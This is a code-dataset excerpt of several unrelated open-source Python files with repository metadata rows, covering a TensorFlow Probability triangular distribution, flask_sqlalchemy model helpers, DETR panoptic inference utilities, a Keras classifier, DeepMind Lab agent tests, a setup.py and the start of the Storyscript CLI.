```none
y
^
z | o (c,z)
| / \
| / \
| / \
| (a,0) / \ (b,0)
0 +------o---------o-------> x
0 a c b
```
where:
* a <= c <= b, a < b
* `low = a`,
* `high = b`,
* `peak = c`,
* `z = 2 / (b - a)`
The parameters `low`, `high` and `peak` must be shaped in a way that supports
broadcasting (e.g., `high - low` is a valid operation).
#### Examples
```python
import tensorflow_probability as tfp
tfd = tfp.distributions
# Specify a single Triangular distribution.
u1 = tfd.Triangular(low=3., high=4., peak=3.5)
u1.mean()
# ==> 3.5
# Specify two different Triangular distributions.
u2 = tfd.Triangular(low=[1., 2.], high=[3., 4.], peak=[2., 3.])
u2.mean()
# ==> [2., 3.]
# Specify three different Triangular distributions by leveraging broadcasting.
u3 = tfd.Triangular(low=3., high=[5., 6., 7.], peak=3.)
u3.mean()
# ==> [3.6666, 4., 4.3333]
```
"""
def __init__(self,
low=0.,
high=1.,
peak=0.5,
validate_args=False,
allow_nan_stats=True,
name='Triangular'):
"""Initialize a batch of Triangular distributions.
Args:
low: Floating point tensor, lower boundary of the output interval. Must
have `low < high`.
Default value: `0`.
high: Floating point tensor, upper boundary of the output interval. Must
have `low < high`.
Default value: `1`.
peak: Floating point tensor, mode of the output interval. Must have
`low <= peak` and `peak <= high`.
Default value: `0.5`.
validate_args: Python `bool`, default `False`. When `True` distribution
parameters are checked for validity despite possibly degrading runtime
performance. When `False` invalid inputs may silently render incorrect
outputs.
Default value: `False`.
allow_nan_stats: Python `bool`, default `True`. When `True`, statistics
(e.g., mean, mode, variance) use the value "`NaN`" to indicate the
result is undefined. When `False`, an exception is raised if one or
more of the statistic's batch members are undefined.
Default value: `True`.
name: Python `str` name prefixed to Ops created by this class.
Default value: `'Triangular'`.
Raises:
InvalidArgumentError: if `validate_args=True` and one of the following is
True:
* `low >= high`.
* `peak > high`.
* `low > peak`.
"""
parameters = dict(locals())
with tf.name_scope(name) as name:
dtype = dtype_util.common_dtype([low, high, peak], tf.float32)
self._low = tensor_util.convert_nonref_to_tensor(
low, name='low', dtype=dtype)
self._high = tensor_util.convert_nonref_to_tensor(
high, name='high', dtype=dtype)
self._peak = tensor_util.convert_nonref_to_tensor(
peak, name='peak', dtype=dtype)
super(Triangular, self).__init__(
dtype=self._low.dtype,
reparameterization_type=reparameterization.FULLY_REPARAMETERIZED,
validate_args=validate_args,
allow_nan_stats=allow_nan_stats,
parameters=parameters,
name=name)
@classmethod
def _parameter_properties(cls, dtype, num_classes=None):
return dict(
low=parameter_properties.ParameterProperties(),
# TODO(b/169874884): Support decoupled parameterization.
high=parameter_properties.ParameterProperties(
default_constraining_bijector_fn=parameter_properties
.BIJECTOR_NOT_IMPLEMENTED,),
# TODO(b/169874884): Support decoupled parameterization.
peak=parameter_properties.ParameterProperties(
default_constraining_bijector_fn=parameter_properties
.BIJECTOR_NOT_IMPLEMENTED,))
@property
def low(self):
"""Lower boundary of the interval."""
return self._low
@property
def high(self):
"""Upper boundary of the interval."""
return self._high
@property
def peak(self):
"""Peak of the distribution. Lies in the interval."""
return self._peak
def _pdf_at_peak(self):
"""Pdf evaluated at the peak."""
return (self.peak - self.low) / (self.high - self.low)
def _event_shape(self):
return tf.TensorShape([])
def _sample_n(self, n, seed=None):
low = tf.convert_to_tensor(self.low)
high = tf.convert_to_tensor(self.high)
peak = tf.convert_to_tensor(self.peak)
seed = samplers.sanitize_seed(seed, salt='triangular')
shape = ps.concat([[n], self._batch_shape_tensor(
low=low, high=high, peak=peak)], axis=0)
samples = samplers.uniform(shape=shape, dtype=self.dtype, seed=seed)
# We use inverse CDF sampling here. Because the CDF is piecewise quadratic,
# we must take square roots.
interval_length = high - low
return tf.where(
# Note the CDF on the left side of the peak is
# (x - low) ** 2 / ((high - low) * (peak - low)).
# If we plug in peak for x, we get that the CDF at the peak
# is (peak - low) / (high - low). Because of this we decide
# which part of the piecewise CDF we should use based on the cdf samples
# we drew.
samples < (peak - low) / interval_length,
# Inverse of (x - low) ** 2 / ((high - low) * (peak - low)).
low + tf.sqrt(samples * interval_length * (peak - low)),
# Inverse of 1 - (high - x) ** 2 / ((high - low) * (high - peak))
high - tf.sqrt((1. - samples) * interval_length * (high - peak)))
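# Illustrative NumPy-only sketch (not part of this class): the same inverse-CDF
# transform used in _sample_n above, for Triangular(low=a, peak=c, high=b). The
# helper name and the use of NumPy here are assumptions for illustration.
def _np_triangular_sample(u, a, c, b):
    # u is a uniform(0, 1) draw; requires a <= c <= b and a < b.
    import numpy as np
    interval = b - a
    return np.where(
        u < (c - a) / interval,
        a + np.sqrt(u * interval * (c - a)),         # left branch of the CDF
        b - np.sqrt((1. - u) * interval * (b - c)))  # right branch of the CDF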
def _prob(self, x):
low = tf.convert_to_tensor(self.low)
high = tf.convert_to_tensor(self.high)
peak = tf.convert_to_tensor(self.peak)
interval_length = high - low
# This is the pdf function when low <= x <= high. This looks like
# a triangle, so we have to treat each line segment separately.
result_inside_interval = tf.where(
(x >= low) & (x <= peak),
# Line segment from (low, 0) to (peak, 2 / (high - low)).
2. * (x - low) / (interval_length * (peak - low)),
# Line segment from (peak, 2 / (high - low)) to (high, 0).
2. * (high - x) / (interval_length * (high - peak)))
return tf.where((x < low) | (x > high),
tf.zeros_like(x),
result_inside_interval)
def _cdf(self, x):
low = tf.convert_to_tensor(self.low)
high = tf.convert_to_tensor(self.high)
peak = tf.convert_to_tensor(self.peak)
interval_length = high - low
# Due to the PDF being not smooth at the peak, we have to treat each side
# somewhat differently. The PDF is two line segments, and thus we get
# quadratics here for the CDF.
result_inside_interval = tf.where(
(x >= low) & (x <= peak),
# (x - low) ** 2 / ((high - low) * (peak - low))
tf.math.squared_difference(x, low) / (interval_length * (peak - low)),
# 1 - (high - x) ** 2 / ((high - low) * (high - peak))
1. - tf.math.squared_difference(high, x) / (
interval_length * (high - peak)))
# We now add that the left tail is 0 and the right tail is 1.
result_if_not_big = tf.where(
x < low, tf.zeros_like(x), result_inside_interval)
return tf.where(x >= high, tf.ones_like(x), result_if_not_big)
def _entropy(self):
return 0.5 - np.log(2.) + tf.math.log(self.high - self.low)
def _mean(self):
return (self.low + self.high + self.peak) / 3.
def _variance(self):
# ((high - low) ** 2 + (peak - low) ** 2 + (peak - high) ** 2) / 36
low = tf.convert_to_tensor(self.low)
high = tf.convert_to_tensor(self.high)
peak = tf.convert_to_tensor(self.peak)
return (tf.math.squared_difference(high, low) +
tf.math.squared_difference(high, peak) +
tf.math.squared_difference(peak, low)) / 36.
def _default_event_space_bijector(self):
return sigmoid_bijector.Sigmoid(
low=self.low, high=self.high, validate_args=self.validate_args)
def _parameter_control_dependencies(self, is_init):
if not self.validate_args:
return []
low = tf.convert_to_tensor(self.low)
high = tf.convert_to_tensor(self.high)
peak = tf.convert_to_tensor(self.peak)
assertions = []
if (is_init != tensor_util.is_ref(self.low) and
is_init != tensor_util.is_ref(self.high)):
assertions.append(assert_util.assert_less(
low, high, message='triangular not defined when low >= high.'))
if (is_init != tensor_util.is_ref(self.low) and
is_init != tensor_util.is_ref(self.peak)):
assertions.append(
assert_util.assert_less_equal(
low, peak, message='triangular not defined when low > peak.'))
if (is_init != tensor_util.is_ref(self.high) and
is_init != tensor_util.is_ref(self.peak)):
assertions.append(
assert_util.assert_less_equal(
peak, high, message='triangular not defined when peak > high.'))
return assertions
def _sample_control_dependencies(self, x):
assertions = []
if not self.validate_args:
return assertions
assertions.append(assert_util.assert_greater_equal(
x, self.low, message='Sample must be greater than or equal to `low`.'))
assertions.append(assert_util.assert_less_equal(
x, self.high, message='Sample must be less than or equal to `high`.'))
return assertions
| 37.288525
| 80
| 0.641431
|
f9a1496b7e654ae4d2966528a807a49cd3966417
| 5,142
|
py
|
Python
|
python3-virtualenv/Lib/python3.6/site-packages/flask_sqlalchemy/model.py
|
LindaNayeli104/mlh-orientation-hackathon-project
|
d86b58f76721a9d5f3374399bfc6d3b1445d16ca
|
[
"MIT"
] | null | null | null |
python3-virtualenv/Lib/python3.6/site-packages/flask_sqlalchemy/model.py
|
LindaNayeli104/mlh-orientation-hackathon-project
|
d86b58f76721a9d5f3374399bfc6d3b1445d16ca
|
[
"MIT"
] | null | null | null |
python3-virtualenv/Lib/python3.6/site-packages/flask_sqlalchemy/model.py
|
LindaNayeli104/mlh-orientation-hackathon-project
|
d86b58f76721a9d5f3374399bfc6d3b1445d16ca
|
[
"MIT"
] | 1
|
2021-06-20T19:28:37.000Z
|
2021-06-20T19:28:37.000Z
|
import re
import sqlalchemy as sa
from sqlalchemy import inspect
from sqlalchemy.ext.declarative import DeclarativeMeta, declared_attr
from sqlalchemy.schema import _get_table_key
from ._compat import to_str
def should_set_tablename(cls):
"""Determine whether ``__tablename__`` should be automatically generated
for a model.
* If no class in the MRO sets a name, one should be generated.
* If a declared attr is found, it should be used instead.
* If a name is found, it should be used if the class is a mixin, otherwise
one should be generated.
* Abstract models should not have one generated.
Later, :meth:`._BoundDeclarativeMeta.__table_cls__` will determine if the
model looks like single or joined-table inheritance. If no primary key is
found, the name will be unset.
"""
if (
cls.__dict__.get('__abstract__', False)
or not any(isinstance(b, DeclarativeMeta) for b in cls.__mro__[1:])
):
return False
for base in cls.__mro__:
if '__tablename__' not in base.__dict__:
continue
if isinstance(base.__dict__['__tablename__'], declared_attr):
return False
return not (
base is cls
or base.__dict__.get('__abstract__', False)
or not isinstance(base, DeclarativeMeta)
)
return True
camelcase_re = re.compile(r'([A-Z]+)(?=[a-z0-9])')
def camel_to_snake_case(name):
def _join(match):
word = match.group()
if len(word) > 1:
return ('_%s_%s' % (word[:-1], word[-1])).lower()
return '_' + word.lower()
return camelcase_re.sub(_join, name).lstrip('_')
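# Illustrative check (not part of flask_sqlalchemy): the helper above turns
# CamelCase class names into snake_case table names, keeping acronym runs intact.
if __name__ == '__main__':
    assert camel_to_snake_case('UserAccount') == 'user_account'
    assert camel_to_snake_case('HTTPResponse') == 'http_response'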
class NameMetaMixin(type):
def __init__(cls, name, bases, d):
if should_set_tablename(cls):
cls.__tablename__ = camel_to_snake_case(cls.__name__)
super(NameMetaMixin, cls).__init__(name, bases, d)
# __table_cls__ has run at this point
# if no table was created, use the parent table
if (
'__tablename__' not in cls.__dict__
and '__table__' in cls.__dict__
and cls.__dict__['__table__'] is None
):
del cls.__table__
def __table_cls__(cls, *args, **kwargs):
"""This is called by SQLAlchemy during mapper setup. It determines the
final table object that the model will use.
If no primary key is found, that indicates single-table inheritance,
so no table will be created and ``__tablename__`` will be unset.
"""
# check if a table with this name already exists
# allows reflected tables to be applied to model by name
key = _get_table_key(args[0], kwargs.get('schema'))
if key in cls.metadata.tables:
return sa.Table(*args, **kwargs)
# if a primary key or constraint is found, create a table for
# joined-table inheritance
for arg in args:
if (
(isinstance(arg, sa.Column) and arg.primary_key)
or isinstance(arg, sa.PrimaryKeyConstraint)
):
return sa.Table(*args, **kwargs)
# if no base classes define a table, return one
# ensures the correct error shows up when missing a primary key
for base in cls.__mro__[1:-1]:
if '__table__' in base.__dict__:
break
else:
return sa.Table(*args, **kwargs)
# single-table inheritance, use the parent tablename
if '__tablename__' in cls.__dict__:
del cls.__tablename__
class BindMetaMixin(type):
def __init__(cls, name, bases, d):
bind_key = (
d.pop('__bind_key__', None)
or getattr(cls, '__bind_key__', None)
)
super(BindMetaMixin, cls).__init__(name, bases, d)
if bind_key is not None and getattr(cls, '__table__', None) is not None:
cls.__table__.info['bind_key'] = bind_key
class DefaultMeta(NameMetaMixin, BindMetaMixin, DeclarativeMeta):
pass
class Model(object):
"""Base class for SQLAlchemy declarative base model.
To define models, subclass :attr:`db.Model <SQLAlchemy.Model>`, not this
class. To customize ``db.Model``, subclass this and pass it as
``model_class`` to :class:`SQLAlchemy`.
"""
#: Query class used by :attr:`query`. Defaults to
# :class:`SQLAlchemy.Query`, which defaults to :class:`BaseQuery`.
query_class = None
#: Convenience property to query the database for instances of this model
# using the current session. Equivalent to ``db.session.query(Model)``
# unless :attr:`query_class` has been changed.
query = None
def __repr__(self):
identity = inspect(self).identity
if identity is None:
pk = "(transient {0})".format(id(self))
else:
pk = ', '.join(to_str(value) for value in identity)
return '<{0} {1}>'.format(type(self).__name__, pk)
| 33.174194
| 81
| 0.609685
|
e9a734c8702e39ccfebb37c6b3ffa933b9387767
| 605
|
py
|
Python
|
beatsaver/entity/MapParitySummary.py
|
jundoll/bs-api-py
|
1e12e1d68d6cbc4c8e25c0da961396854391be5b
|
[
"MIT"
] | null | null | null |
beatsaver/entity/MapParitySummary.py
|
jundoll/bs-api-py
|
1e12e1d68d6cbc4c8e25c0da961396854391be5b
|
[
"MIT"
] | null | null | null |
beatsaver/entity/MapParitySummary.py
|
jundoll/bs-api-py
|
1e12e1d68d6cbc4c8e25c0da961396854391be5b
|
[
"MIT"
] | null | null | null |
# load modules
from dataclasses import dataclass
# definition class
@dataclass(frozen=True)
class MapParitySummary:
errors: int
resets: int
warns: int
# definition function
def gen(response):
if response is not None:
instance = MapParitySummary(
errors=response.get('errors'),
resets=response.get('resets'),
warns=response.get('warns')
)
return instance
def gen_list(response):
if response is not None:
if len(response) == 0:
return []
else:
return [gen(v) for v in response]
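# Illustrative behaviour (added sketch, not part of the original file), assuming
# an API response fragment like {'errors': 2, 'resets': 0, 'warns': 5}:
# gen() returns MapParitySummary(errors=2, resets=0, warns=5), gen_list() maps a
# list of such fragments, and both return None when the response is None.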
| 18.333333
| 45
| 0.601653
|
fe86c657be4152059da23e31836f4e2f4270b808
| 8,427
|
py
|
Python
|
inference/utils.py
|
joyjeni/detr-fine
|
dfc0f4abc2579a2b3ef4527904af3345c7a9de4d
|
[
"Apache-2.0"
] | null | null | null |
inference/utils.py
|
joyjeni/detr-fine
|
dfc0f4abc2579a2b3ef4527904af3345c7a9de4d
|
[
"Apache-2.0"
] | null | null | null |
inference/utils.py
|
joyjeni/detr-fine
|
dfc0f4abc2579a2b3ef4527904af3345c7a9de4d
|
[
"Apache-2.0"
] | null | null | null |
import math
import time
import datetime
import io
import itertools
import torch
from pathlib import Path
from copy import deepcopy
import numpy as np
import seaborn as sns
import matplotlib.pyplot as plt
from PIL import Image, ImageDraw, ImageFont
from panopticapi.utils import id2rgb, rgb2id
from detectron2.utils.visualizer import Visualizer
from detr.datasets.construction import make_construction_transforms
from detr.datasets.categories_meta import id2cat, get_builtin_metadata
palette = itertools.cycle(sns.color_palette())
meta = get_builtin_metadata("construction_panoptic_separated")
def load_image(pth, fixed_height=800):
impath = Path(pth)
imo = Image.open(impath)
height_percent = (fixed_height / float(imo.size[1]))
width_size = int((float(imo.size[0]) * float(height_percent)))
imo = imo.resize((width_size, fixed_height))
iw, ih = imo.size
return imo, iw, ih
def apply_transform(imo, iw, ih, device):
transform = make_construction_transforms("val")
dummy_target = {
"size": torch.as_tensor([int(ih), int(iw)]),
"orig_size": torch.as_tensor([int(ih), int(iw)])
}
image, targets = transform(imo, dummy_target)
image = image.unsqueeze(0)
image = image.to(device)
return image
def run_prediction(model, image, postprocessors, device, threshold=0.85):
outputs = model.to(device)(image)
postprocessors['panoptic'].threshold = threshold
panoptic = postprocessors['panoptic'](outputs, torch.as_tensor(image.shape[-2:]).unsqueeze(0))[0]
logits = outputs["pred_logits"].cpu()
boxes = outputs["pred_boxes"].cpu()
masks = outputs["pred_masks"].cpu()
scores = logits.softmax(-1)[..., :-1].max(-1)[0]
    # threshold the confidence, keeping only predictions above the threshold
keep = scores > threshold
return scores[keep], logits[keep], boxes[keep], masks[keep].detach().numpy(), panoptic
def overlay_boxes(img, iw, ih, scores, logits, boxes, debug=False):
imn = img.copy()
drw = ImageDraw.Draw(imn)
font = ImageFont.load_default() # ImageFont.truetype("arial")
for score, logit, box in zip(scores, logits, boxes):
cat = logit.argmax()
if cat < 1:
continue
label = f'{id2cat[cat.item()]} ({score:.2f})'
box = box * torch.Tensor([iw, ih, iw, ih])
x, y, w, h = box
# x0, x1 = x-w//2, x+w//2
# y0, y1 = y-h//2, y+h//2
rbbox = torch.tensor([(x - 0.5 * w), (y - 0.5 * h), (x + 0.5 * w), (y + 0.5 * h)]).cpu()
rbbox[0::2].clamp_(min=0, max=torch.tensor(iw))
rbbox[1::2].clamp_(min=0, max=torch.tensor(ih))
if debug:
print(label, rbbox)
drw.rectangle(list(rbbox), outline='red', width=3)
# drw.text((rbbox[0]+4, rbbox[1]+2), label, fill='white')
# get text size
text_size = font.getsize(label)
        # size the label background with a 3px margin on each side of the text
        label_size = (text_size[0]+6, text_size[1]+6)
        # create an image of that size with a green background
        label_img = Image.new('RGBA', label_size, "green")
        # draw the label text with the 3px margin
        label_draw = ImageDraw.Draw(label_img)
        label_draw.text((3, 3), label, font=font, fill='white')
        # paste the label onto the source image at (x1+2, y1+2)
imn.paste(label_img, (rbbox[0]+2, rbbox[1]+2))
return imn
def get_panoptic_mask(panoptic):
# The segmentation is stored in a special-format png
panoptic_seg = Image.open(io.BytesIO(panoptic['png_string']))
# Convert to numpy array
panoptic_seg = np.array(panoptic_seg, dtype=np.uint8).copy()
# We retrieve the ids corresponding to each mask
panoptic_seg_id = rgb2id(panoptic_seg)
# Finally we color each mask individually
panoptic_seg[:, :, :] = np.asarray(next(palette)) * 255
for sid in range(panoptic_seg_id.max() + 1):
panoptic_seg[panoptic_seg_id == sid] = np.asarray(next(palette)) * 255
return panoptic_seg
def get_panoptic_overlay(imo, panoptic):
# The segmentation is stored in a special-format png
panoptic_seg = Image.open(io.BytesIO(panoptic['png_string']))
pw, ph = panoptic_seg.size
# Convert to numpy array
panoptic_seg = np.array(panoptic_seg, dtype=np.uint8).copy()
# We retrieve the ids corresponding to each mask
panoptic_seg_id = rgb2id(panoptic_seg)
panoptic_seg_id_tensor = torch.from_numpy(panoptic_seg_id)
segments_info = deepcopy(panoptic["segments_info"])
for i in range(len(segments_info)):
c = segments_info[i]["category_id"]
segments_info[i]["category_id"] = meta.thing_dataset_id_to_contiguous_id[c] if segments_info[i]["isthing"] else meta.stuff_dataset_id_to_contiguous_id[c]
# Finally we visualize the prediction
visualize = Visualizer(np.array(imo.copy().resize((pw, ph)))[:, :, ::-1], meta, scale=1.0)
visualize._default_font_size = 20
visualize = visualize.draw_panoptic_seg_predictions(panoptic_seg_id_tensor, segments_info, area_threshold=0)
overlayed = visualize.get_image()
return overlayed
def get_masks(logits, masks):
mask_array = []
for logit, mask in zip(logits, masks):
cat = logit.argmax()
if cat < 1:
continue
mask_array.append({
'mask': mask,
'label': f'{id2cat[cat.item()]}'
})
return mask_array
def get_prediction(pth, model, postprocessors, threshold, device, debug=False):
start = time.time()
result = {}
# Load image with path provided
imo, iw, ih = load_image(pth)
result["original_image"] = imo
# Apply transform to normalize and convert to tensor
image = apply_transform(imo, iw, ih, device)
# Run prediction and threshold output
scores, logits, boxes, masks, panoptic = run_prediction(model, image, postprocessors, device, threshold)
result["boxed_image"] = overlay_boxes(imo, iw, ih, scores, logits, boxes, debug=debug)
result["mask_images"] = get_masks(logits, masks)
result["panoptic_mask"] = get_panoptic_mask(panoptic)
result["panoptic_image"] = get_panoptic_overlay(imo, panoptic)
print(f"Time Taken: {datetime.timedelta(seconds=int(time.time() - start))}")
return result, logits, boxes, masks # keep, pred_logits, pred_masks.detach().numpy(), imn, result_panoptic
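# Hedged usage sketch (added, not part of the original file): `model` and
# `postprocessors` are assumed to come from the DETR model-building code
# elsewhere in this repository, and 'sample.jpg' is a placeholder path.
#
#     device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
#     result, logits, boxes, masks = get_prediction(
#         'sample.jpg', model, postprocessors, threshold=0.85, device=device)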
def visualize_masks(masks):
# Plot all the remaining masks
if len(masks) == 1:
plt.imshow(masks[0]["mask"], cmap="cividis")
# plt.set_title(f'{id2cat[pred_logits[1].argmax().item()]}', {'fontsize': 15})
plt.axis('off')
elif len(masks) == 2:
_, axarr = plt.subplots(1,2, figsize=(10, 10))
for i, ax in enumerate(axarr):
ax.imshow(masks[i]["mask"], cmap="cividis")
ax.set_title(f'{masks[i]["label"]}', {'fontsize': 15})
ax.axis('off')
else:
ncols = 2
fig, axs = plt.subplots(ncols=ncols, nrows=math.ceil(len(masks) / ncols), figsize=(15, 10))
# for aa in axs:
# for ax in aa:
# ax.axis('off')
for i, mask in enumerate(masks):
ax = axs[i // ncols, i % ncols]
ax.imshow(mask["mask"], cmap="cividis")
ax.set_title(mask["label"], {'fontsize': 15})
ax.axis('off')
fig.tight_layout()
plt.show()
def visualize_predictions(result, save_result=False, name='result.png'):
_, axarr = plt.subplots(2, 2, figsize=(20,10))
axarr[0][0].imshow(result["original_image"])
axarr[0][0].set_title('Input Image', {'fontsize': 15})
axarr[0][0].axis('off')
axarr[0][1].imshow(result["boxed_image"])
axarr[0][1].set_title('Boxed Image', {'fontsize': 15})
axarr[0][1].axis('off')
# axarr[2].imshow(Image.open(f"../data/panoptic/{iname.split('.')[0]}.png"))
# axarr[2].set_title('Target Mask', {'fontsize': 15})
# axarr[2].axis('off')
axarr[1][0].imshow(result["panoptic_mask"])
axarr[1][0].axis('off')
axarr[1][0].set_title('Predicted Mask', {'fontsize': 15})
axarr[1][1].imshow(result["panoptic_image"])
axarr[1][1].axis('off')
axarr[1][1].set_title('Overlayed', {'fontsize': 15})
if save_result:
plt.savefig(f"../data/predictions/{name}", bbox_inches='tight')
plt.show()
| 32.164122
| 161
| 0.632728
|
27e8400bb5aa13a6b575823a459aa105948e76cf
| 836
|
py
|
Python
|
src/models/model.py
|
akash-harijan/cataract-detection
|
ccb7045290a7a002bba1ff68220d19ec3a79ea2d
|
[
"MIT"
] | null | null | null |
src/models/model.py
|
akash-harijan/cataract-detection
|
ccb7045290a7a002bba1ff68220d19ec3a79ea2d
|
[
"MIT"
] | null | null | null |
src/models/model.py
|
akash-harijan/cataract-detection
|
ccb7045290a7a002bba1ff68220d19ec3a79ea2d
|
[
"MIT"
] | null | null | null |
from tensorflow import keras
import tensorflow as tf
def create_model(img_size=(160, 160, 3)):
base_model = keras.applications.MobileNetV2(
weights="imagenet",
input_shape=img_size,
include_top=False,
)
base_model.trainable = False
inputs = keras.Input(shape=img_size)
x = base_model(inputs, training=False)
x = keras.layers.GlobalAveragePooling2D()(x)
x = keras.layers.Dropout(0.2)(x) # Regularize with dropout
outputs = keras.layers.Dense(1, activation='sigmoid')(x)
model = keras.Model(inputs, outputs)
model.summary()
base_learning_rate = 0.0001
model.compile(optimizer=tf.keras.optimizers.Adam(lr=base_learning_rate),
                  loss=tf.keras.losses.BinaryCrossentropy(from_logits=False),  # outputs are already sigmoid probabilities
metrics=['accuracy'])
return model
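# Hedged usage sketch (added, not part of the original file); `train_ds` and
# `val_ds` are assumed tf.data datasets of 160x160 RGB images with binary labels.
#
#     model = create_model(img_size=(160, 160, 3))
#     history = model.fit(train_ds, validation_data=val_ds, epochs=10)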
| 29.857143
| 76
| 0.67823
|
1e3c1b2f82d63d436b3d191343215bffda7b1e99
| 3,122
|
py
|
Python
|
python/tests/random_agent_test.py
|
bfakhri/dml_custom
|
1e908b10890df11e510d72c21f3125e3069a0eac
|
[
"CC-BY-4.0"
] | null | null | null |
python/tests/random_agent_test.py
|
bfakhri/dml_custom
|
1e908b10890df11e510d72c21f3125e3069a0eac
|
[
"CC-BY-4.0"
] | null | null | null |
python/tests/random_agent_test.py
|
bfakhri/dml_custom
|
1e908b10890df11e510d72c21f3125e3069a0eac
|
[
"CC-BY-4.0"
] | null | null | null |
# Copyright 2016 Google Inc.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
"""Basic test for the random Python agent."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import unittest
from python import random_agent
import deepmind_lab
class RandomAgentsTest(unittest.TestCase):
def test_spring_agent_run(self, length=100):
env = deepmind_lab.Lab(
'tests/empty_room_test', ['RGB_INTERLACED'],
config={
'fps': '60',
'controls': 'external',
'width': '80',
'height': '80'
})
env.reset()
agent = random_agent.SpringAgent(env.action_spec())
reward = 0
for _ in xrange(length):
if not env.is_running():
print('Environment stopped early')
env.reset()
obs = env.observations()
action = agent.step(reward, obs['RGB_INTERLACED'])
reward = env.step(action, 1)
self.assertIsInstance(reward, float)
def test_discretized_random_agent_run(self, length=100):
env = deepmind_lab.Lab(
'tests/empty_room_test', ['RGB_INTERLACED'],
config={
'fps': '60',
'width': '80',
'height': '80'
})
env.reset()
agent = random_agent.DiscretizedRandomAgent()
reward = 0
for _ in xrange(length):
if not env.is_running():
print('Environment stopped early')
env.reset()
obs = env.observations()
action = agent.step(reward, obs['RGB_INTERLACED'])
reward = env.step(action, 1)
self.assertIsInstance(reward, float)
def test_map_frame_count(self, length=100):
env = deepmind_lab.Lab(
'tests/empty_room_test', ['MAP_FRAME_NUMBER'],
config={'fps': '60',
'width': '80',
'height': '80'})
env.reset()
agent = random_agent.DiscretizedRandomAgent()
reward = 0
for frame in xrange(length):
if not env.is_running():
print('Environment stopped early')
env.reset()
obs = env.observations()
action = agent.step(reward, None)
env.step(action, 1)
frame_number = int(obs['MAP_FRAME_NUMBER'])
self.assertEquals(frame, frame_number)
if __name__ == '__main__':
if os.environ.get('TEST_SRCDIR'):
deepmind_lab.set_runfiles_path(
os.path.join(os.environ['TEST_SRCDIR'],
'org_deepmind_lab'))
unittest.main()
| 29.45283
| 73
| 0.648943
|
af43a86dfd1fac51ec074a3286dca14f904b42c4
| 867
|
py
|
Python
|
setup.py
|
TimCosby/generic_execute
|
85fdee7ea1bd6ae027223c80333bf8c6899128d9
|
[
"Apache-2.0"
] | null | null | null |
setup.py
|
TimCosby/generic_execute
|
85fdee7ea1bd6ae027223c80333bf8c6899128d9
|
[
"Apache-2.0"
] | null | null | null |
setup.py
|
TimCosby/generic_execute
|
85fdee7ea1bd6ae027223c80333bf8c6899128d9
|
[
"Apache-2.0"
] | null | null | null |
from setuptools import setup
with open('README.md', 'r') as file:
long_description = file.read()
setup(
name='gexecute',
version='0.0.6',
author='Tim Cosby',
author_email='tim470773@gmail.com',
url='https://github.com/TimCosby/generic_execute',
    description='Generically execute any function with an unknown function, module, or set of parameters!',
long_description=long_description,
long_description_content_type="text/markdown",
py_modules=['gexecute'],
package_dir={'': 'src'},
license='MIT',
classifiers=[
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.7",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
python_requires='>=3.4',
keywords='generic execute function module',
)
| 32.111111
| 107
| 0.637832
|
e7b09695aeb06f61a2c26b5230e0c3bd6d05d4c2
| 6,680
|
py
|
Python
|
storyscript/Cli.py
|
edvald/storyscript
|
a912586a65c1ee31cb634092e952767da6215269
|
[
"Apache-2.0"
] | null | null | null |
storyscript/Cli.py
|
edvald/storyscript
|
a912586a65c1ee31cb634092e952767da6215269
|
[
"Apache-2.0"
] | null | null | null |
storyscript/Cli.py
|
edvald/storyscript
|
a912586a65c1ee31cb634092e952767da6215269
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
import io
import os
import click
from click_alias import ClickAliasedGroup
from .App import App
from .Features import Features
from .Project import Project
from .Version import version as app_version
from .exceptions import StoryError
story_features = Features.all_feature_names()
def preview_cb(ctx, param, values):
"""
Special handling for preview flags.
    +<feature>, -<feature>, and <feature> are valid forms for each feature name.
    All passed --preview arguments are processed in order. Thus, if a feature
is specified twice, the later argument will overwrite the earlier.
Returns: dict of {<feature>: True/False}
"""
features = {}
for v in values:
flag = True
if v.startswith('+'):
v = v[1:]
if v.startswith('-'):
v = v[1:]
flag = False
if v in story_features:
features[v] = flag
else:
StoryError.create_error('invalid_preview_flag', flag=v).echo()
ctx.exit(1)
return features
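# Illustrative parse (added sketch, not part of the original file): if
# story_features contained the hypothetical names 'foo' and 'bar', then passing
# `--preview +foo --preview -bar` would make preview_cb return
# {'foo': True, 'bar': False}; an unknown name reports 'invalid_preview_flag'
# and exits with status 1.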
class Cli:
version_help = 'Prints Storyscript version'
silent_help = 'Silent mode. Return syntax errors only.'
ebnf_help = 'Load the grammar from a file. Useful for development'
preview_help = 'Activate upcoming Storyscript features'
@click.group(invoke_without_command=True, cls=ClickAliasedGroup)
@click.option('--version', '-v', is_flag=True, help=version_help)
@click.pass_context
def main(context, version): # noqa N805
"""
Learn more at http://storyscript.org
"""
if version:
message = 'StoryScript {} - http://storyscript.org'
click.echo(message.format(app_version))
exit()
if context.invoked_subcommand is None:
click.echo(context.get_help())
@staticmethod
@main.command(aliases=['p'])
@click.argument('path', default=os.getcwd())
@click.option('--debug', is_flag=True)
@click.option('--ebnf', help=ebnf_help)
@click.option('--raw', is_flag=True)
@click.option('--lower', is_flag=True)
@click.option('--preview', callback=preview_cb, is_eager=True,
multiple=True, help=preview_help)
@click.option('--ignore', default=None,
help='Specify path of ignored files')
def parse(path, debug, ebnf, raw, ignore, lower, preview):
"""
Parses stories, producing the abstract syntax tree.
"""
try:
trees = App.parse(path, ignored_path=ignore, ebnf=ebnf,
lower=lower, features=preview)
for story, tree in trees.items():
click.echo('File: {}'.format(story))
if raw:
click.echo(tree)
else:
click.echo(tree.pretty())
except StoryError as e:
if debug:
raise e.error
else:
e.echo()
exit(1)
except Exception as e:
if debug:
raise e
else:
StoryError.internal_error(e).echo()
exit(1)
@staticmethod
@main.command(aliases=['c'])
@click.argument('path', default=os.getcwd())
@click.argument('output', required=False)
@click.option('--json', '-j', is_flag=True)
